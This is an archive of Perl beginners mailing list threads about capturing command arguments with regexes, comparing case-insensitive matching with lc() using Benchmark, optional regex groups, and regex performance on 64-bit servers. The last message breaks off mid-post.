Re: multiple named captures with a single regexp

2017-03-01 Thread Chas. Owens

/(\w+)/g gets the command as well and only the args are wanted, so it would
need to be

my @args = $s =~ /(\w+)/g;
shift @args;

also,

my VAR if TEST;

is deprecated IIRC and slated to be removed soon (as its behavior is
surprising).  It would probably be better to say

my @args = $s =~ /^\w+\s/ && $s =~ /(?:\s+(\w+))/g;

or (if you don't like using && like that)

my @args = $s =~ /^\w+\s/ ? $s =~ /(?:\s+(\w+))/g : ();
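
A minimal sketch of the ternary form above, wrapped in a helper so the
"no command" case is easy to see. The name args_of and the second test
string are made up for illustration. As far as I can tell, the && form
leaves the false value of the first match in @args (one element) when the
command check fails, whereas the ternary yields a truly empty list.

```perl
use strict;
use warnings;

# Hypothetical helper (not from the thread): return the arguments of a
# command line, or an empty list when the line does not start with a
# command word followed by whitespace.
sub args_of {
    my ($s) = @_;
    return $s =~ /^\w+\s/ ? $s =~ /(?:\s+(\w+))/g : ();
}

my @args = args_of("command arg1 arg2 arg3 arg4");
my @none = args_of("!!! arg1 arg2");   # no leading command word

print "args: @args\n";
print "none: ", scalar(@none), " element(s)\n";
```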



On Wed, Mar 1, 2017 at 9:34 AM X Dungeness  wrote:

> On Wed, Mar 1, 2017 at 2:52 AM, Chas. Owens  wrote:
> > Sadly, Perl will only capture the last match of a capture with a
> > quantifier, so that just won't work.  The split function really is the
> > simplest and most elegant solution for this sort of problem (you have a
> > string with a delimiter and you want the pieces).  All of that said, if
> > you are willing to modify the regex you can say
> >
> > my $s = "command arg1 arg2 arg3 arg4";
> > my @args = $s =~ /(?:\s+(\w+))/g;
> >
>
> Hm, I'd write it as:
>  my @args = $s =~ / (\w+)/g;
>
> or, if the command check isn't too inelegant:
>
>  my @args =  $s =~ / (\w+)/g if $s =~ /^command\s/;
>
>
> > for my $arg (@args) {
> > print "$arg\n";
> > }
> >
> > However, this does not allow you to check the command is correct.
> >
>

Re: multiple named captures with a single regexp

2017-03-01 Thread X Dungeness

On Wed, Mar 1, 2017 at 2:52 AM, Chas. Owens  wrote:
> Sadly, Perl will only capture the last match of a capture with a quantifier, so
> that just won't work.  The split function really is the simplest and most
> elegant solution for this sort of problem (you have a string with a
> delimiter and you want the pieces).  All of that said, if you are willing to
> modify the regex you can say
>
> my $s = "command arg1 arg2 arg3 arg4";
> my @args = $s =~ /(?:\s+(\w+))/g;
>

Hm, I'd write it as:
 my @args = $s =~ / (\w+)/g;

or, if the command check isn't too inelegant:

 my @args =  $s =~ / (\w+)/g if $s =~ /^command\s/;


> for my $arg (@args) {
> print "$arg\n";
> }
>
> However, this does not allow you to check the command is correct.
>

-- 
To unsubscribe, e-mail: beginners-unsubscr...@perl.org
For additional commands, e-mail: beginners-h...@perl.org
http://learn.perl.org/

Re: multiple named captures with a single regexp

2017-03-01 Thread Chas. Owens

Sadly, Perl will only keep the last match of a capture group that has a
quantifier, so that just won't work.  The split function really is the simplest and
most elegant solution for this sort of problem (you have a string with a
delimiter and you want the pieces).  All of that said, if you are willing
to modify the regex you can say

my $s = "command arg1 arg2 arg3 arg4";
my @args = $s =~ /(?:\s+(\w+))/g;

for my $arg (@args) {
    print "$arg\n";
}

However, this does not allow you to check the command is correct.
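
To make the difference concrete, here is a small sketch (the variable
$last is my own name, not from the thread) contrasting a quantified
capture group with a /g match in list context:

```perl
use strict;
use warnings;

my $s = "command arg1 arg2 arg3 arg4";

# A capture group under a quantifier is overwritten on every iteration,
# so only the final argument survives.
my ($last) = $s =~ /^command(?:\s+(\w+))+/;

# With /g in list context, the match returns every capture it finds.
my @args = $s =~ /\s+(\w+)/g;

print "last: $last\n";
print "args: @args\n";
```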

Another option, and I would in no way claim this is an elegant solution, is
to use code execution in the middle of the regex with (?{}) to pull out the
matched fields:

@args = ();

my $start;
$s =~ m{
    \w+ # command
    \s
    (?{$start = pos;}) # capture the first start position
    (?:
        \w+ # the argument
        # capture the argument
        (?{ push @args, substr $s, $start, pos() - $start; })
        # optional delimiter and capture the next start
        (?: \s+ (?{ $start = pos; }))?
    )+
}x;

for my $arg (@args) {
    print "$arg\n";
}

Of course, all of these solutions are bound to fail when you hit the real
world (assuming the command is a Unix command) as arguments are allowed to
have spaces in them if they are quoted.  There is a way to do this with
regex, but balancing the quotes is far more pain than it is worth.  A
simple regex to tokenize the string plus some logic to put the quoted
sections back together will allow you to extract the arguments from the
string:

#!/usr/bin/perl

use strict;
use warnings;

my $s = qq("command with space" arg1 "arg 2" "arg3");

my @parts = $s =~ /([ ]+|"|\w+)/g;

my @args;
my $in_string = 0;
my $buf = "";
while (@parts) {
    my $part = shift @parts;

    # ditch the delimiters if not in a string
    next if not $in_string and $part =~ / /;

    # in strings, a " means end the string
    # otherwise, just build up a buffer of the things
    # in the string
    if ($in_string) {
        if ($part eq '"') {
            $in_string = 0;
            push @args, $buf;
            $buf = "";
        } else {
            $buf .= $part;
        }
        next;
    }

    # if not in a string, " means start a string
    if ($part eq '"') {
        $in_string = 1;
        next;
    }

    # if not a delimiter or a ", then this is just a normal token
    push @args, $part;
}

shift @args; #ditch the command

for my $arg (@args) {
    print "$arg\n";
}

Of course, this still doesn't handle Unix commands properly as you can
escape " and use ' to create strings, but those details are left as an
exercise for the reader.
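
For what it's worth, the core module Text::ParseWords already covers
much of that exercise. This is only a sketch, not part of the original
solution; the sample string (including the single-quoted argument) is
made up for illustration:

```perl
use strict;
use warnings;
use Text::ParseWords qw(shellwords);

# Sample input with double-quoted and single-quoted words.
my $s = q{"command with space" arg1 "arg 2" 'arg 3'};

# shellwords() splits on whitespace while honouring quotes,
# and strips the quote characters from the result.
my ($command, @args) = shellwords($s);

print "command: $command\n";
print "arg: $_\n" for @args;
```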

On Wed, Mar 1, 2017 at 4:04 AM Luca Ferrari <fluca1...@infinito.it> wrote:

> Hi all,
> I'm not sure if this is possible, but imagine I've got a line as follows:
>
> command arg1 arg2 arg3 arg4 ...
>
> I would like to capture all args with a single regexp, possibly with a
> named capture, but I don't know exactly how to do:
>
> my $re = qr/command\s+(?\w+)+/;
>
> the above of course is going to capture only the first one (one shoot)
> or the last one within a loop.
> How can I extract the whole array of arguments?
>
> Please note, a raw solution is to remove the command and split, but
> I'm asking for a more elegant solution.
>
> Thanks,
> Luca
>

Re: multiple named captures with a single regexp

2017-03-01 Thread Shlomi Fish

Hi Luca,

On Wed, 1 Mar 2017 10:01:34 +0100
Luca Ferrari <fluca1...@infinito.it> wrote:

> Hi all,
> I'm not sure if this is possible, but imagine I've got a line as follows:
> 
> command arg1 arg2 arg3 arg4 ...
> 
> I would like to capture all args with a single regexp, possibly with a
> named capture, but I don't know exactly how to do:
> 
> my $re = qr/command\s+(?\w+)+/;
> 
> the above of course is going to capture only the first one (one shoot)
> or the last one within a loop.
> How can I extract the whole array of arguments?
> 

Perhaps try using \G together with the /g flag (and possibly /o); see:

http://perl-begin.org/uses/text-parsing/

(Note that perl-begin is a site that I maintain).
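
A rough sketch of the \G idea, assuming the sample line from the
question (the variable names and the $consumed_all check are mine, not
from the linked page):

```perl
use strict;
use warnings;

my $s = "command arg1 arg2 arg3 arg4";

my $command;
my @args;

# In scalar context, /g resumes at pos($s) and \G anchors the match
# there; /c keeps pos($s) in place when a match fails.
if ($s =~ /\G(\w+)/gc) {
    $command = $1;
    while ($s =~ /\G\s+(\w+)/gc) {
        push @args, $1;
    }
}

# If pos($s) reached the end, the whole line was consumed.
my $consumed_all = (pos($s) // 0) == length $s;

print "command: $command\n";
print "arg: $_\n" for @args;
```

Because the command is matched separately from the arguments, it can be
checked (for example with eq) before the loop runs.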

Regards,

Shlomi Fish


> Please note, a raw solution is to remove the command and split, but
> I'm asking for a more elegant solution.
> 
> Thanks,
> Luca
> 



-- 
-
Shlomi Fish   http://www.shlomifish.org/
Freecell Solver - http://fc-solve.shlomifish.org/

It is a good idea to stop worrying about problems (or “problems” in quotes)
that cannot be fixed.


multiple named captures with a single regexp

2017-03-01 Thread Luca Ferrari

Hi all,
I'm not sure if this is possible, but imagine I've got a line as follows:

command arg1 arg2 arg3 arg4 ...

I would like to capture all args with a single regexp, possibly with a
named capture, but I don't know exactly how to do:

my $re = qr/command\s+(?\w+)+/;

the above of course is going to capture only the first one (one shoot)
or the last one within a loop.
How can I extract the whole array of arguments?

Please note, a raw solution is to remove the command and split, but
I'm asking for a more elegant solution.

Thanks,
Luca


Re: Regexp under PERL

2015-07-08 Thread Kent Fredric

On 8 July 2015 at 19:12, Nagy Tamas (TVI-GmbH) tamas.n...@tvi-gmbh.de wrote:
> This is the code:
>
> } elsif (defined($row) && ($row =~ m/\(\*[ ]+\\@PATH\[ ]+:=[ ]+'(\/)?([\*A-Za-z_ ]*(\/)?)+'[ ]\*\)?/)) {
>  # PATH  first version:   \(\*[ ]+@PATH[ ]+:=[ ]+'(\\/)?([\*A-Za-z_ ]*(\\/)?)+'[ ]\*\)?
>
>  my @path = split(':=', $row, 2);
>  $temppath = $path[1];
>  my trimmedpath = split(''', $temppath, 3);
>
>  $currentpath = trimmedpath[1];
>
> The last )) is the closing of the elsif. Sorry. Still no idea.
>
> Tamas Nagy

Again, you're just bolting stuff together in the email client and thinking
it's the code. There's no way that can work. The most obvious problem is
that you have three quote marks in split(), meaning everything after that
is nonsense.

Then you use variables without sigils ( which is also nonsense under strict )

And you entirely forget to declare variables ( again, nonsense under strict ).

When you eliminate all those superficial defects, the code has no
bugs, and executes silently without so much as a squeak.

Attached is what I have, and it doesn't replicate the problem.

-- 
Kent

KENTNL - https://metacpan.org/author/KENTNL


x.pl
Description: Perl program

Re: Regexp under PERL

2015-07-08 Thread Nagy Tamas (TVI-GmbH)

Hi,

This is the code:

} elsif (defined($row) && ($row =~ m/\(\*[ ]+\\@PATH\[ ]+:=[ ]+'(\/)?([\*A-Za-z_ ]*(\/)?)+'[ ]\*\)?/)) {
 # PATH  first version:   \(\*[ ]+@PATH[ ]+:=[ ]+'(\\/)?([\*A-Za-z_ ]*(\\/)?)+'[ ]\*\)?

 my @path = split(':=', $row, 2);
 $temppath = $path[1];
 my trimmedpath = split(''', $temppath, 3);

 $currentpath = trimmedpath[1];

The last )) is the closing of the elsif. Sorry. Still no idea.

Tamas Nagy

 
 

-----Original Message-----
From: Kent Fredric [mailto:kentfred...@gmail.com]
Sent: Tuesday, 7 July 2015 19:03
To: Nagy Tamas (TVI-GmbH)
Cc: beginners@perl.org
Subject: Re: Regexp under PERL

On 8 July 2015 at 04:40, Nagy Tamas (TVI-GmbH) tamas.n...@tvi-gmbh.de wrote:
> m/\(\*[ ]+\\@PATH\[ ]+:=[ ]+'(\/)?([\*A-Za-z_ ]*(\/)?)+'[ ]\*\)?/))

This is obviously not the exact code you're using, because the last 2 )
marks are actually outside the regex.

Removing those ))'s makes the regex compile just fine.

So we need the code, not just the regex.

Ideally, if you can give some perl code that is minimal that replicates your 
problem exactly, then that would be very helpful in us helping you.

Ideally, your code should be reduced as far as possible till you have the least 
possible amount of code that demonstrates your problem.

Additional notes:  Values in @PATH are not relevant to your expression, because 
you explicitly escape the @ to mean a literal @.
If you did not escape it, it would have interpolated.

But even then, I'd still have no idea what you are doing :)

--
Kent

KENTNL - https://metacpan.org/author/KENTNL

Regexp under PERL

2015-07-07 Thread Nagy Tamas (TVI-GmbH)

Hi,

Perl accepts this line, but for the following lines it reports: String found
where operator expected at line...

m/\(\*[ ]+\\@PATH\[ ]+:=[ ]+'(\/)?([\*A-Za-z_ ]*(\/)?)+'[ ]\*\)?/))

So it seems that it is not ok.

I have the proper regexp that was tested at  http://www.regexr.com/

# Tested version:   \(\*[ ]+@PATH[ ]+:=[ ]+'(\\/)?([\*A-Za-z_ ]*(\\/)?)+'[ ]\*\)?

Input data:

(* @PATH := '\/ph\/** Forest\/Apple' *)
(* @PATH := '\/ph\/** Forest\/Pear' *)
(* @PATH := '\/ph\/** Forest\/Tree\/Plum' *)
(* @PATH := '\/ph\/** Forest\/Oaktree\/Oak' *)

If I use the tested version, it reports: Unmatched ( in regex; marked by <-- HERE
in m/..:=[ ]+'( <-- HERE at . line

Tamas

Re: Regexp under PERL

2015-07-07 Thread Kent Fredric

On 8 July 2015 at 04:40, Nagy Tamas (TVI-GmbH) tamas.n...@tvi-gmbh.de wrote:
> m/\(\*[ ]+\\@PATH\[ ]+:=[ ]+'(\/)?([\*A-Za-z_ ]*(\/)?)+'[ ]\*\)?/))

This is obviously not the exact code you're using, because the last 2
) marks are actually outside the regex.

Removing those ))'s makes the regex compile just fine.

So we need the code, not just the regex.

Ideally, if you can give some perl code that is minimal that
replicates your problem exactly, then that would be very helpful in us
helping you.

Ideally, your code should be reduced as far as possible till you have
the least possible amount of code that demonstrates your problem.

Additional notes:  Values in @PATH are not relevant to your
expression, because you explicitly escape the @ to mean a literal @.
If you did not escape it, it would have interpolated.

But even then, I'd still have no idea what you are doing :)
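
For reference, a minimal self-contained sketch of the kind of test case
being asked for, using the input lines from the original post. The
pattern is a simplified one of my own (a single capture for the quoted
path), not the poster's regex; m{...}x is used so that neither / nor '
needs special care, and \@ keeps @PATH from interpolating:

```perl
use strict;
use warnings;

# Sample rows taken from the original post, plus one non-matching line.
my @rows = (
    q{(* @PATH := '\/ph\/** Forest\/Apple' *)},
    q{(* @PATH := '\/ph\/** Forest\/Tree\/Plum' *)},
    q{not a path line},
);

my @paths;
for my $row (@rows) {
    # Capture everything between the single quotes.
    if ($row =~ m{ \( \* [ ]+ \@PATH [ ]+ := [ ]+ ' ( [^']* ) ' [ ]* \* \) }x) {
        push @paths, $1;
    }
}

print "$_\n" for @paths;
```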

-- 
Kent

KENTNL - https://metacpan.org/author/KENTNL


Re: is faster a regexp with multiple choices or a single one with lower case?

2015-01-08 Thread Luca Ferrari

Hi Bill,

On Thu, Jan 8, 2015 at 1:36 AM, $Bill n...@todbe.com wrote:
> Why not just ignore the case ?

Sure, it's an option.

> Why does the script care what the case is ?  Is there a rationale for
> checking it ?

Of course there is, and of course my script does different things
depending on what I'm looking at.
I just posted a short example to discuss regular expressions, not the
particular case in my script (which is, by the way, quite simple).

Thanks,
Luca


Re: is faster a regexp with multiple choices or a single one with lower case?

2015-01-08 Thread David Precious

On Wed, 7 Jan 2015 10:59:07 +0200
Shlomi Fish shlo...@shlomifish.org wrote:
> Anyway, one can use the Benchmark.pm module to determine which
> alternative is faster, but I suspect their speeds are not going to be
> that much different. See:
>
> http://perl-begin.org/topics/optimising-and-profiling/
>
> (Note: perl-begin.org is a site I originated and maintain).

And this is the answer I'd give - if you're curious as to which of two
approaches will be faster, benchmark it and find out.  It's often
better to do this yourself, as the results may in some cases vary widely
depending on the system you're running it on, the perl version, how
Perl was built, etc.

The sure-fire way to see which of multiple options is faster is to use
Benchmark.pm to try them and find out :)

For an example, I used the following (dirty) short script to set up
1,000 test filenames with random lengths and capitalisation, half of
which should match the pattern, and testing each approach against all
of those test filenames, 10,000 times:


[davidp@supernova:~]$ cat tmp/benchmark_lc.pl 
#!/usr/bin/perl

use strict;
use Benchmark;

# Put together an array of various test strings, with random
# lengths and case
my @valid_chars = ('a'..'z', 'A'..'Z');
my @test_data = map {
    join('', map { $valid_chars[int rand @valid_chars] } 1..rand(10))
        . (rand() < 0.5 ? '.bat' : '.bar')
} (1..1000);

Benchmark::cmpthese(10_000,
    {
        lc_first => sub {
            # note: $string aliases the array element, so this
            # lowercases @test_data in place
            for my $string (@test_data) {
                $string = lc $string;
                if ($string =~ /\.bat$/) {
                }
            }
        },
        regex_nocase => sub {
            for my $string (@test_data) {
                if ($string =~ /\.bat$/i) {
                }
            }
        },
    },
);




And my results suggest that, for me, using lc() on the string first
before attempting to match was around 30% faster:


[davidp@supernova:~]$ perl tmp/benchmark_lc.pl 
               Rate regex_nocase     lc_first
regex_nocase 2674/s           --         -24%
lc_first     3509/s          31%           --


Of course, YMMV.



-- 
David Precious (bigpresh) dav...@preshweb.co.uk
http://www.preshweb.co.uk/ www.preshweb.co.uk/twitter
www.preshweb.co.uk/linkedin www.preshweb.co.uk/facebook
www.preshweb.co.uk/cpan www.preshweb.co.uk/github




Re: is faster a regexp with multiple choices or a single one with lower case?

2015-01-07 Thread Shlomi Fish

On Wed, 7 Jan 2015 07:56:18 +
Andrew Solomon and...@geekuni.com wrote:

> Hi Luca,
>
> I haven't tested it, but my suspicion is that your first solution will
> be faster because regular expressions (which don't contain variables)
> are only compiled once, while you have a function call for every use
> of lc.
>
> By the way another alternative might be:
>
> $extension =~ /\.bat/i
>
> (which would also match BaT, BAt...)
>

The second code excerpt that was given will also match all that:

«
$extension = lc $extension;
$extension =~ / \.bat /x;
»
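
To spell out the difference in what each test accepts (speed aside),
here is a small sketch; the file names and the %seen hash are made up
for illustration:

```perl
use strict;
use warnings;

my %seen;
for my $name (qw(run.bat RUN.BAT Run.BaT run.bar)) {
    my $alt   = $name     =~ / \.bat | \.BAT /x ? 1 : 0;   # alternation
    my $lc    = lc($name) =~ / \.bat /x         ? 1 : 0;   # lowercase first
    my $icase = $name     =~ / \.bat /xi        ? 1 : 0;   # /i flag
    $seen{$name} = [ $alt, $lc, $icase ];
    printf "%-8s alt=%d lc=%d i=%d\n", $name, $alt, $lc, $icase;
}
```

Only the alternation rejects mixed case such as Run.BaT; the lc and /i
variants accept any capitalisation.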

Anyway, one can use the Benchmark.pm module to determine which alternative is
faster, but I suspect their speeds are not going to be that much different. See:

http://perl-begin.org/topics/optimising-and-profiling/

(Note: perl-begin.org is a site I originated and maintain).

Regards,

Shlomi Fish

-- 
-
Shlomi Fish   http://www.shlomifish.org/
Perl Humour - http://perl-begin.org/humour/

John: Hey, we are completely non-violent vampires. We don’t suck blood.
Selina: I thought all vampires suck blood.
John: Bullocks, hen. Vampires come in all shapes and sizes.
— http://www.shlomifish.org/humour/Selina-Mandrake/

Please reply to list if it's a mailing list post - http://shlom.in/reply .


is faster a regexp with multiple choices or a single one with lower case?

2015-01-06 Thread Luca Ferrari

Hi all,
this could be trivial, and I suspect the answer is that the regexp
engine is smart enough, but suppose I want to test the following:

$extension =~ / \.bat | \.BAT /x;

is the following a better solution?

$extension = lc $extension;
$extension =~ / \.bat /x;

In other words, when testing for all-lower or all-upper case, should I
first transform to one of them or use a regexp with alternatives?
Any suggestions?

Thanks,
Luca


Re: is faster a regexp with multiple choices or a single one with lower case?

2015-01-06 Thread Andrew Solomon

Hi Luca,

I haven't tested it, but my suspicion is that your first solution will
be faster because regular expressions (which don't contain variables)
are only compiled once, while you have a function call for every use
of lc.

By the way another alternative might be:

$extension =~ /\.bat/i

(which would also match BaT, BAt...)

Andrew

On Wed, Jan 7, 2015 at 7:45 AM, Luca Ferrari fluca1...@infinito.it wrote:
> Hi all,
> this could be trivial, and I suspect the answer is that the regexp
> engine is smart enough, but suppose I want to test the following:
>
> $extension =~ / \.bat | \.BAT /x;
>
> is the following a better solution?
>
> $extension = lc $extension;
> $extension =~ / \.bat /x;
>
> In other words, when testing for all-lower or all-upper case, should I
> first transform to one of them or use a regexp with alternatives?
> Any suggestions?
>
> Thanks,
> Luca






-- 
Andrew Solomon

Mentor@Geekuni http://geekuni.com/
http://www.linkedin.com/in/asolomon


RegExp

2014-03-08 Thread rakesh sharma

Hi all,
how do you get all words starting with letter 'r' in a string.
thanks, rakesh

Re: RegExp

2014-03-08 Thread Shawn H Corey

On Sat, 8 Mar 2014 18:20:48 +0530
rakesh sharma rakeshsharm...@hotmail.com wrote:

> Hi all,
> how do you get all words starting with letter 'r' in a string.
> thanks, rakesh
 

/\br/


-- 
Don't stop where the ink does.
Shawn


Re: RegExp

2014-03-08 Thread Shlomi Fish

Hello Rakesh,

On Sat, 8 Mar 2014 18:20:48 +0530
rakesh sharma rakeshsharm...@hotmail.com wrote:

> Hi all,
> how do you get all words starting with letter 'r' in a string.
> thanks, rakesh
 

1. Find all words in the sentence. Your idea of what is a word will need to be
specified.

2. Put them in an array - let's say @words.

3. Use « grep { /\Ar/i } @words » . See: 

* http://perldoc.perl.org/functions/grep.html

* https://metacpan.org/pod/List::MoreUtils

* https://metacpan.org/pod/List::Util
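
The three steps above can be sketched as follows. The sample sentence is
made up, and "word" is assumed here to mean a run of \w characters:

```perl
use strict;
use warnings;

my $string = "Rakesh ran around the red river, really";

# Steps 1 and 2: collect the words (assumption: a word is a run of \w).
my @words = $string =~ /(\w+)/g;

# Step 3: keep the words that start with 'r', ignoring case.
my @rwords = grep { /\Ar/i } @words;

print "$_\n" for @rwords;
```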

Regards,

— Shlomi Fish

-- 
-
Shlomi Fish   http://www.shlomifish.org/
Escape from GNU Autohell - http://www.shlomifish.org/open-source/anti/autohell/

There is an IGLU Cabal, but its only purpose is to deny the existence of an
IGLU Cabal.
— Martha Greenberg

Please reply to list if it's a mailing list post - http://shlom.in/reply .


Re: RegExp

2014-03-08 Thread Janek Schleicher


Am 08.03.2014 13:50, schrieb rakesh sharma:

how do you get all words starting with letter 'r' in a string.


What have you tried so far?


Greetings,
Janek



Re: RegExp

2014-03-08 Thread Jim Gibson


On Mar 8, 2014, at 4:50 AM, rakesh sharma rakeshsharm...@hotmail.com wrote:

> Hi all,
>
> how do you get all words starting with letter 'r' in a string.

Try

  my @rwords = $string =~ /\br\w*?\b/g;


Re: regexp puzzle

2014-03-08 Thread Bill McCormick


On 3/8/2014 12:05 AM, Bill McCormick wrote:

> I have the following string I want to extract from:
>
> my $str = "foo (3 bar): baz";
>
> and I want to end up with
>
> $p1 = "foo";
> $p2 = 3;
> $p3 = "baz";
>
> the complication is that the \s(\d\s.+) is optional, so then $p2 may
> not be set.
>
> getting close was
>
> my ($p1, $p3) = $str =~ /^(.+):\s(.*)$/;
>
> How can I make the  (3 bar) optional?



Here's what I came up with:

($key, $lines, $value) = $_ =~ /^(.+?)(?:\s\((\d)\s.+\))?:\s(.*)$/;
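
A quick check of that pattern against both shapes of input (the second
sample line and the @results array are mine, added for illustration).
Note that (\d) captures a single digit only:

```perl
use strict;
use warnings;

my @results;
for my $line ("foo (3 bar): baz", "foo: baz") {
    # $lines stays undef when the optional "(N word)" part is absent.
    my ($key, $lines, $value) =
        $line =~ /^(.+?)(?:\s\((\d)\s.+\))?:\s(.*)$/;
    push @results, [ $key, $lines, $value ];
    printf "key=%s lines=%s value=%s\n",
        $key, defined $lines ? $lines : 'undef', $value;
}
```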



regexp puzzle

2014-03-07 Thread Bill McCormick


I have the following string I want to extract from:

my $str = "foo (3 bar): baz";

and I want to end up with

$p1 = "foo";
$p2 = 3;
$p3 = "baz";

the complication is that the \s(\d\s.+) is optional, so then $p2 may
not be set.


getting close was

my ($p1, $p3) = $str =~ /^(.+):\s(.*)$/;

How can I make the  (3 bar) optional?

Thanks!


Re: regexp puzzle

2014-03-07 Thread shawn wilson

([^]+) \(([0-9]+).*\) ([a-z]+)
On Mar 8, 2014 1:07 AM, Bill McCormick wpmccorm...@gmail.com wrote:

> I have the following string I want to extract from:
>
> my $str = "foo (3 bar): baz";
>
> and I want to end up with
>
> $p1 = "foo";
> $p2 = 3;
> $p3 = "baz";
>
> the complication is that the \s(\d\s.+) is optional, so then $p2 may
> not be set.
>
> getting close was
>
> my ($p1, $p3) = $str =~ /^(.+):\s(.*)$/;
>
> How can I make the  (3 bar) optional?
>
> Thanks!


Re: regexp puzzle

2014-03-07 Thread Bill McCormick


On 3/8/2014 12:41 AM, shawn wilson wrote:

> my $str = "foo (3 bar): baz";


my $test = "foo (3 bar): baz";
my ($p1, $p2, $p3) = $test =~ /([^]+) \(([0-9]+).*\) ([a-z]+)/;
print "p1=[$p1] p2=[$p2] p3=[$p3]\n";

Use of uninitialized value $p1 in concatenation (.) or string at 
./lock_report.pl line 11.
Use of uninitialized value $p2 in concatenation (.) or string at 
./lock_report.pl line 11.
Use of uninitialized value $p3 in concatenation (.) or string at 
./lock_report.pl line 11.

p1=[] p2=[] p3=[]


Re: regexp puzzle

2014-03-07 Thread shawn wilson

On Mar 8, 2014 1:41 AM, shawn wilson ag4ve...@gmail.com wrote:


Oh, and to make it optional, just do (?:\([0-9]+).*\)?
You should probably do
my @match = $str =~ / ([^]+)  (?:\([0-9]+).*\)? ([a-z]+)/;
my ($a, $b, $c) = (scalar(@match) == 3 ? @match : ($match[0], undef,
$match[1]));

> ([^]+) \(([0-9]+).*\) ([a-z]+)
>
> On Mar 8, 2014 1:07 AM, Bill McCormick wpmccorm...@gmail.com wrote:
>>
>> I have the following string I want to extract from:
>>
>> my $str = "foo (3 bar): baz";
>>
>> and I want to end up with
>>
>> $p1 = "foo";
>> $p2 = 3;
>> $p3 = "baz";
>>
>> the complication is that the \s(\d\s.+) is optional, so then $p2 may
>> not be set.
>>
>> getting close was
>>
>> my ($p1, $p3) = $str =~ /^(.+):\s(.*)$/;
>>
>> How can I make the  (3 bar) optional?
>>
>> Thanks!


Re: regexp puzzle

2014-03-07 Thread Jim Gibson


On Mar 7, 2014, at 10:05 PM, Bill McCormick wpmccorm...@gmail.com wrote:

> I have the following string I want to extract from:
>
> my $str = "foo (3 bar): baz";
>
> and I want to end up with
>
> $p1 = "foo";
> $p2 = 3;
> $p3 = "baz";
>
> the complication is that the \s(\d\s.+) is optional, so then $p2 may not
> be set.
>
> getting close was
>
> my ($p1, $p3) = $str =~ /^(.+):\s(.*)$/;


You can make a substring optional by following it with the ? quantifier. If your
substring is more than one character, you can group it with capturing
parentheses or a non-capturing grouping construct (?: ).

Here is a sample, using the extended regular expression syntax with the x
option:

my( $p1, $p2, $p3 ) = $str =~ m{ \A (\w+) \s+ (?: \( (\d+) \s+ \w+ \) )? : \s
(\w+) }x;
if( $p1 && $p3 ) {
    print "p1=$p1, p2=$p2, p3=$p3\n";
}else{
    print "No match\n";
}

Always test the returned values to see if the match succeeded.

So if '(3 bar)' is not present, does the colon still remain? That will
determine if the colon should be inside or outside the optional substring part.
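
One way to test the match itself rather than the captured values is to
put the list assignment in the condition. This is a sketch under the
assumption that the colon always remains; the \s+ has been moved inside
the optional group, and the sample strings and @results are my own:

```perl
use strict;
use warnings;

my @results;
for my $str ("foo (3 bar): baz", "foo: baz", "no colon here") {
    # A list assignment in boolean context is true only when the match
    # returned something, i.e. when the pattern matched.
    if (my ($p1, $p2, $p3) =
            $str =~ m{ \A (\w+) (?: \s+ \( (\d+) \s+ \w+ \) )? : \s+ (\w+) }x) {
        push @results, [ $p1, $p2, $p3 ];
        printf "p1=%s p2=%s p3=%s\n", $p1, $p2 // 'undef', $p3;
    } else {
        print "No match: $str\n";
    }
}
```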



perl regexp performance - architecture?

2014-02-17 Thread Phil Smith

I'm currently loading some new servers with CentOS6 on which perl5.10 is
the standard version of perl provided. However, I've also loaded perl5.18
and I don't think the version of perl is significant in the results I'm
seeing. Basically, I'm seeing perl performance significantly slower on my
new systems than on my 6 year old systems.

Here's some of the relevant details:

+ 6 year old server, 32 bit architecture, CentOS5 perl5.8
perl, and in particular regexp operations, perform reasonably fast.

+ Very new server, 64 bit architecture, CentOS6, perl5.10 (and have tried
perl5.18)
perl, and in particular regexp operations, perform significantly slower
than on the 6 year old server. That struck me as odd right off. I thought
surely, perl running on a modern high-end cpu is going to beat out my code
running on 6 year old hardware.

I've compared CPU models at various CPU benchmarking sites and the new
CPUs, as you would expect, are ranked significantly higher in performance
than the old.

I've also installed perl5.8 on the new 64bit servers and the performance is
similar to that of perl5.10 and perl5.18 on the same 64bit servers. Given
that, I don't think perl version plays a significant factor in the
performance diffs.

Is it an accepted fact that perl performance takes a hit on 64 bit
architecture?

I've tried comparing some of the perl -V and Config.pm results looking for
significant differences. That output is pretty verbose and the most
significant difference is the architecture.

I could provide some of my benchmarking code if that would be of help. The
differences are significant. The only reason I'm looking at this is because
I could see right off that some of my code is taking 30-40% longer to run
in the new environment. Once I started putting in some timing
with Time::HiRes I could see the delay involved large amounts of regexp
processing.

Right now, I'm just looking for any opinions on what I'm seeing so that I
know the architecture is the significant factor in the performance
degradation and then consider any recommendations for improvements. I'm
happy to provide further relevant details.
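
For anyone wanting to compare machines, a timing harness along these
lines could be run unchanged on both. It is only a sketch: the test
data and the pattern are invented, not my real workload.

```perl
use strict;
use warnings;
use Config;
use Time::HiRes qw(gettimeofday tv_interval);

# Invented test data: 50,000 short lines.
my @lines = map { "command arg$_ value$_" } 1 .. 50_000;

my $t0   = [gettimeofday];
my $hits = 0;
for my $line (@lines) {
    # The backreference \1 makes the engine do a little extra work.
    $hits++ if $line =~ /\barg(\d+)\s+value\1\b/;
}
my $elapsed = tv_interval($t0);

# Report the build details next to the timing so runs can be compared.
printf "%s ivsize=%s perl=%vd: %d matches in %.3fs\n",
    $Config{archname}, $Config{ivsize}, $^V, $hits, $elapsed;
```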

Thanks,
Phil

Re: perl regexp performance - architecture?

2014-02-17 Thread Charles DeRykus

On Mon, Feb 17, 2014 at 12:41 PM, Phil Smith philbo...@gmail.com wrote:

> I'm currently loading some new servers with CentOS6 on which perl5.10 is
> the standard version of perl provided. However, I've also loaded perl5.18
> and I don't think the version of perl is significant in the results I'm
> seeing. Basically, I'm seeing perl performance significantly slower on my
> new systems than on my 6 year old systems.
>
> Here's some of the relevant details:
>
> + 6 year old server, 32 bit architecture, CentOS5 perl5.8
> perl, and in particular regexp operations, perform reasonably fast.
>
> + Very new server, 64 bit architecture, CentOS6, perl5.10 (and have tried
> perl5.18)
> perl, and in particular regexp operations, perform significantly slower
> than on the 6 year old server. That struck me as odd right off. I thought
> surely, perl running on a modern high-end cpu is going to beat out my code
> running on 6 year old hardware.
>
> I've compared CPU models at various CPU benchmarking sites and the new
> CPUs, as you would expect, are ranked significantly higher in performance
> than the old.
>
> I've also installed perl5.8 on the new 64bit servers and the performance
> is similar to that of perl5.10 and perl5.18 on the same 64bit servers.
> Given that, I don't think perl version plays a significant factor in the
> performance diffs.
>
> Is it an accepted fact that perl performance takes a hit on 64 bit
> architecture?
>
> I've tried comparing some of the perl -V and Config.pm results looking for
> significant differences. That output is pretty verbose and the most
